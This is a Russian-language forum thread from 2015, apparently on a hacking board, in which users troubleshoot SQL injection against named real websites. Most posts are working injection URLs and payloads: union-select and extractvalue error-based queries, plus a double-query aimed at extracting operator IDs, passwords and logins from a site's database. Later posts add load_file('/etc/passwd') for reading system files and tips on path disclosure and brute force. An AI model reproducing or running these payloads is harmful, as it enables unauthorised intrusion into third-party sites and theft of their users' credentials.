18.01.2015, 19:07
|
|
Новичок
Регистрация: 20.03.2014
Сообщений: 5
С нами:
6394646
Репутация:
0
|
|
Сообщение от faza02
что именно не получается? составьте корректный запрос и все нормально
В том то и дело, что не могу понять в чем ошибка моего запроса. 5я ветка... information_schema должна быть по определению...
Unknown column 'information_schema' in 'where clause'
|
|
|
18.01.2015, 20:10
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
С нами:
9671366
Репутация:
332
|
|
Сообщение от None
Unknown
column
'information_schema'
information_schema - бд "по определению" а не колонка/таблица =)
у тебя же
Сообщение от None
table_
name
=information_schema
а надо, если нужна именно information_schema (хотя непонятно зачем она тебе):
Сообщение от None
table_
schema
=information_schema
|
|
|
|
18.01.2015, 20:34
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Код:
http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
|
|
|
|
18.01.2015, 21:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
вот пример как вот здесь,почему не выводится,таким запросом
5*(SELECT 1 FROM information_schema.tables WHERE 1 group by concat((select (select (select concat(0x27,unhex(Hex(cast(netzwerk_schnittstelle. betreiber_id as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_passwort as char))),0x5e,unhex(Hex(cast(netzwerk_schnittstelle .betreiber_kennung as char))),0x27) from `mlsvsf_db`.netzwerk_schnittstelle limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2)) having min(0))
в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор?
Код:
http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,version())))
|
|
|
|
18.01.2015, 21:29
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор?
Код:
http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,version())))
версия 5.5.4 www.werbevirus.de/img/media.php?art=bannerklick
|
|
|
|
18.01.2015, 23:55
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
версия 5.5.4 www.werbevirus.de/img/media.php?art=bannerklick
Код:
http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELECT nickname FROM netzwerk_user LIMIT 0,1))))
а те колонки из вашего запроса - пустые.
|
|
|
|
19.01.2015, 00:16
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
Код:
http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELECT nickname FROM netzwerk_user LIMIT 0,1))))
а те колонки из вашего запроса - пустые. спасибо
я маленько не так сделала
1 |(ExtractValue(1,concat(0x5c,(SELECT GROUP_CONCAT(CONCAT_WS(0x3a,betreiber_id,betreiber _passwort,betreiber_kennung)) FROM netzwerk_schnittstelle ))))
пустые но не все))
|
|
|
|
20.01.2015, 03:21
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
С нами:
9597253
Репутация:
82
|
|
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
|
|
|
|
20.01.2015, 04:14
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от mazaxaka
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
select load_file('/etc/passwd')
|
|
|
|
20.01.2015, 11:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Br@!ns
select load_file('/etc/passwd')
даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей
или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
